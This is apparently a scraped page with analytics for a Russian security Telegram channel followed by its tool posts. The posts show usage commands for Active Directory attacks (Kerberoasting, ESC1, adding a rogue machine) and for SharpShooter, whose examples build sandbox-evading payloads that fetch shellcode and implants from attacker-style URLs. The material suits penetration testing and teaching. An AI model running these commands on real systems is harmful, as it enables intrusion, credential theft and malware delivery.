Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Show more📈 Analytical overview of Telegram channel Codeby
Channel Codeby (@codeby_sec) in the Russian language segment is an active participant. Currently, the community unites 36 835 subscribers, ranking 3 512 in the Technologies & Applications category and 17 227 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 36 835 subscribers.
According to the latest data from 28 August, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 37 over the last 30 days and by -4 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 6.66%. Within the first 24 hours after publication, content typically collects 4.10% reactions from the total number of subscribers.
- Post reach: On average, each post receives 2 454 views. Within the first day, a publication typically gains 1 511 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 14.
- Thematic interests: Content is focused on key topics such as edr, api, вектор, mitre, att&ck.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Thanks to the high frequency of updates (latest data received on 29 August, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
Инструмент для тестирования на проникновение в среде Active Directory, написанный на языке C# и предназначенный для проведения оценки безопасности. Он объединяет несколько методов атак на AD в простом в использовании в инструменте с интерактивным интерфейсом командной строки.SpicyAD автоматически определяет и использует LDAPS (порт 636), если он доступен, и LDAP (порт 389), если нет. 🟧Возможности Содержит в себе 5 различных категорий атак: 🟧Перечисление - получение информации о домене, пользователях, компьютерах, отношениях в домене, делегаций, LAPS, шаблонов сертификатов; 🟧Атаки Kerberos - Kerberoasting (RC4/AES), AS-REP Roasting, Password Spray, Pass-the-Ticket, Targeted Kerberoasting; 🟧Атаки на ADCS - ESC1, ESC4, PKINIT + UnPAC-the-hash; 🟧Атаки на получение учетных данных - Shadow Credentials, RBCD; 🟧Управление AD - добавление/удаление пользователей, узлов, изменение паролей и т.д. Флаги, используемые для подключения к домену: 🟧/domain:<fqdn> - FQDN целевого домена; 🟧/dc-ip:<ip> - IP-адрес контроллера домена; 🟧/user:<user> - логин для аутентификации в домене; 🟧/password:<pwd> - пароль для аутентификации в домене; 🟧/dns:<ip> (опциональный параметр) - IP-адрес DNS-сервера. Примеры использования🟧 Сбор данных через bloodhound.
.\SpicyAD.exe bloodhound /collection:all #or .\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd bloodhound /collection:allПоиск уязвимостей в шаблонах сертификатов (ESC1-4, ESC8).
.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd enum-vulnsПроведение ESC1-атаки.
.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:lowpriv /password:P@ssw0rd esc1 /template:VulnTemplate /target:administrator /sidДобавление новой машины в домен.
.\SpicyAD.exe /domain:evilcorp.net /dc-ip:10.10.10.10 /user:admin /password:P@ssw0rd add-machine /name:YOURPC$ /mac-pass:P@ssw0rd123#AD #tools #pentest #ESC ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
git clone https://gist.github.com/5fb49b007d48cf2717bc3c12958e47b5.git
mv 5fb49b007d48cf2717bc3c12958e47b5/ osintmaster/
cd osintmaster/
pip install waybackpy --break-system-packages
📌Запуск:
python3 Master_osint.py
#tools #osint
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджеромpip3 install uro --break-system-packages
sudo apt install golang-go
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
Лучше добавить эти команды в ~/.bashrc
go install github.com/tomnomnom/waybackurls@latest
sudo apt-get install arjun
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
sudo apt-get install jq toilet lolcat
git clone https://github.com/blackhatethicalhacking/SQLMutant.git
cd SQLMutant/
chmod +x SQLMutant.sh
📌Запуск:
./SQLMutant.sh
#tools #web #SQL
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджеромgit clone https://github.com/HunxByts/Go-Hash.git
cd Go-Hash
pip3 install -r requirements.txt --break-system-packages
📌Запуск:
python3 gohash.py
#tools #hash #cryptography
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджеромgit clone https://github.com/zmap/zdns.git
cd zdns
make install
Состоит из следующих типов модулей:
🔴Модули Raw DNS предоставляют необработанный DNS-ответ от сервера, аналогичный dig, но в формате JSON. Существует модуль практически для каждого типа DNS-записи.
A, AAAA, AFSDB, ANY, ATMA, AVC, AXFR, BINDVERSION, CAA, CDNSKEY, CDS, CERT, CNAME, CSYNC, DHCID, DMARC, DNSKEY, DS, EID, EUI48, EUI64, GID, GPOS, HINFO, HIP, HTTPS, ISDN, KEY, KX, L32, L64, LOC, LP, MB, MD, MF, MG, MR, MX, NAPTR, NID, NINFO, NS, NSAPPTR, NSEC, NSEC3, NSEC3PARAM, NSLOOKUP, NULL, NXT, OPENPGPKEY, PTR, PX, RP, RRSIG, RT, SVCBS, MIMEA, SOA, SPF, SRV, SSHFP, TALINK, TKEY, TLSA, TXT, UID, UINFO, UNSPEC, URI.🔴Модули Lookup предоставляют более полезные ответы, когда требуется несколько запросов (например, выполнение дополнительного
A поиска для IP-адресов, если получен NS в NSLOOKUP).
🔴Модули Misc предоставляют другие дополнительные средства запроса серверов (например, bind.version).
🔺Использование
Инструмент состоит из библиотеки рекурсивного резолвера и оболочки CLI.
1️⃣Raw DNS - echo "censys.io" | zdns A
В выводе для данной команды будет содержаться следующая информация:
{ "name": "censys.io", "results": { "A": { "data": { "additionals": [ { "flags": "", "type": "EDNS0", "udpsize": 512, "version": 0 } ], "answers": [ { "answer": "104.18.10.85", "class": "IN", "name": "censys.io", "ttl": 300, "type": "A" }, { "answer": "104.18.11.85", "class": "IN", "name": "censys.io", "ttl": 300, "type": "A" } ], "protocol": "udp", "resolver": "[2603:6013:9d00:3302::1]:53" }, "duration": 0.285295416, "status": "NOERROR", "timestamp": "2024-08-23T13:12:43-04:00" } } }2️⃣ Модуль Lookup. Необработанные DNS-ответы часто не содержат нужных данных. Например, ответ
MX может не включать связанные A записи в дополнительном разделе, что требует дополнительного поиска. Для устранения этого недостатка инструмент также предоставляет несколько модулей поиска: alookup, mxlookup, nslookup.
🔴alookup работает аналогично nslookup и отслеживает записи CNAME.
🔴mxlookup дополнительно выполняет поиск A для IP-адресов, соответствующих записи обмена.
🔴nslookup дополнительно выполняет поиск A/AAAA для IP-адресов, соответствующих записи NS.
echo "censys.io" | zdns mxlookup --ipv4-lookup
В выводе для данной команды будет содержаться следующая информация:
{ "name": "censys.io", "results": { "MXLOOKUP": { "data": { "exchanges": [ { "class": "IN", "ipv4_addresses": [ "209.85.202.27" ], "name": "alt1.aspmx.l.google.com", "preference": 5, "ttl": 300, "type": "MX" }, { "class": "IN", "ipv4_addresses": [ "142.250.31.26" ], "name": "aspmx.l.google.com", "preference": 1, "ttl": 300, "type": "MX" } ] }, "duration": 0.154786958, "status": "NOERROR", "timestamp": "2024-08-23T13:10:11-04:00" } } }#tools #DNS #resolver ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
git clone https://github.com/hackermexico/geolocator_ultimate.git
cd geolocator_ultimate/
📌Запуск:
➖Запуск с доменом или IP:
python3 geoultimate.py <TAGRGET>
➖Сохранить вывод в JSON:
python3 geoultimate.py <TAGRGET> --save
#tools #osint
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджеромВключайте режим сыска. Сопоставляйте улики, стройте версии. Ваши теории ждём в комментариях!💻➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с http://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xslP.S. Используйте этот инструмент только в образовательных целях! #tools #payload #SharpShooter ➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
